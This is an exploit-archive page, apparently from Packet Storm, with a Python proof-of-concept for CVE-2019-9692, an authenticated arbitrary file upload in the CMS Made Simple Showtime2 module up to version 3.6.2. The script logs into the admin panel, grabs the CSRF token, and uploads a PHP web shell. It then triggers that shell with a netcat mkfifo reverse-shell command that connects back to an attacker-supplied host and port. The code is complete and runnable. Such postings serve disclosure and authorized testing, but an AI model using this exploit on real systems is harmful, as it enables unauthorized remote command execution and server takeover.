exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload
Posted Mar 15, 2019
Authored by Daniele Scanu

CMS Made Simple Showtime2 module version 3.6.2 suffers from an authenticated arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
advisories | CVE-2019-9692
SHA-256 | fa20c0dbf5abddd0ecf04e638c87694a61d978bf9edf8380b83ae038d3fe85d9

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

Change Mirror Download
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module <= 3.6.2
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
# CVE : 2019-9692

import requests
import optparse
from requests_toolbelt.multipart.encoder import MultipartEncoder

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. https://192.168.1.10/cms)")
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
options, args = parser.parse_args()

if not options.url:
print "[-] Specify an uri target"
exit()

if not options.username:
print "[-] Specify an username for login in administrator panel"
exit()

if not options.password:
print "[-] Specify a password for login in administrator panel"
exit()

base_uri = options.url
url_login = base_uri + "/admin/login.php"
user = options.username
password = options.password
session = requests.Session()
__c_var = ""
lhost = options.local
lport = options.port

# Login in administrator panel for get the csrf token
def login(username, password):
print "[*] Login to cms"
global __c_var
credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
response = session.post(url_login, data=credentials, allow_redirects=False)
__c_var = response.headers['Location'].split("__c=")[1]
print "[*] Token value: " + __c_var

# upload a php script with reverse shell in vulnerable functionality
def upload_shell():
print "[*] Uploading webshell"
multipart_data = MultipartEncoder(
fields = {
'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
'__c': __c_var,
'mact': 'Showtime2,m1_,defaultadmin,0',
'm1_upload_submit': 'Upload'
}
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
headers={'Content-Type': multipart_data.content_type})

# Call the script uploaded for spawn a reverse shell
def spawn_shell():
print "[*] Spawn a shell to " + lhost + ":" + str(lport)
payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
requests.post(base_uri + "/uploads/images/shell.php", data=payload)

login(user, password)
upload_shell()
spawn_shell()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close